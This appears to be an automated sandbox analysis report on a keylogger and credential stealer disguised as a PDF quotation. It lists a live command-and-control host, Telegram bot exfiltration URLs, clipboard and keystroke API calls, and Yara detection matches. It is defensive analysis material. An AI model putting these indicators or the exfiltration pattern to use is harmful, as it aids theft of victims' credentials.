Source: palladiums.exe, 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4574535869.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, palladiums.exe, 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000003.00000002.4578047269.0000000003B93000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000349B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: palladiums.exe, 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4574535869.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, palladiums.exe, 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000349B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000349B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000349B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20a
Source: RegSvcs.exe, 00000003.00000002.4578047269.0000000003B93000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000003.00000002.4578047269.0000000003B93000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000003.00000002.4578047269.0000000003B93000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000007.00000002.4574423762.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.00000000035A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002D24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enP
Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000356C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4574535869.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4574535869.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000349B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.0000000003470000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.00000000033FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: palladiums.exe, 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4574535869.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, palladiums.exe, 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.00000000033FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000007.00000002.4574423762.00000000033FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4574535869.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4574535869.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000349B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000342D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.0000000003470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000003.00000002.4578047269.0000000003B93000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000007.00000002.4574423762.00000000035A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002D55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/P
Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000359D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49857 version: TLS 1.2

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_0027EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0027EAFF

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0027ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_0027ED6A
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0056ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_0056ED6A

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

0_2_0027EAFF

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_0026AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0026AA57

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00299576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_00299576
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00589576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_00589576

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.palladiums.exe.e20000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.palladiums.exe.e20000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.palladiums.exe.e20000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.palladiums.exe.3880000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.palladiums.exe.3880000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.palladiums.exe.3880000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.palladiums.exe.3880000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.palladiums.exe.3880000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.palladiums.exe.3880000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.palladiums.exe.e20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.palladiums.exe.e20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.palladiums.exe.e20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: palladiums.exe PID: 5812, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 3648, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe, 00000000.00000000.2107362222.00000000002C2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a691b51d-b
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe, 00000000.00000000.2107362222.00000000002C2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_8c0c18cf-c
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe, 00000000.00000003.2132745896.0000000003DF1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8f9d3625-d
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe, 00000000.00000003.2132745896.0000000003DF1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_9fb7f06b-f
Source: palladiums.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: palladiums.exe, 00000002.00000002.2160825207.00000000005B2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2243731c-4
Source: palladiums.exe, 00000002.00000002.2160825207.00000000005B2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_9c78341f-9
Source: palladiums.exe, 00000006.00000000.2284314834.00000000005B2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a7c413fd-5
Source: palladiums.exe, 00000006.00000000.2284314834.00000000005B2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4cd07173-2
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ba7749a9-4
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_1cc90539-9
Source: palladiums.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_dd0ef8c9-d
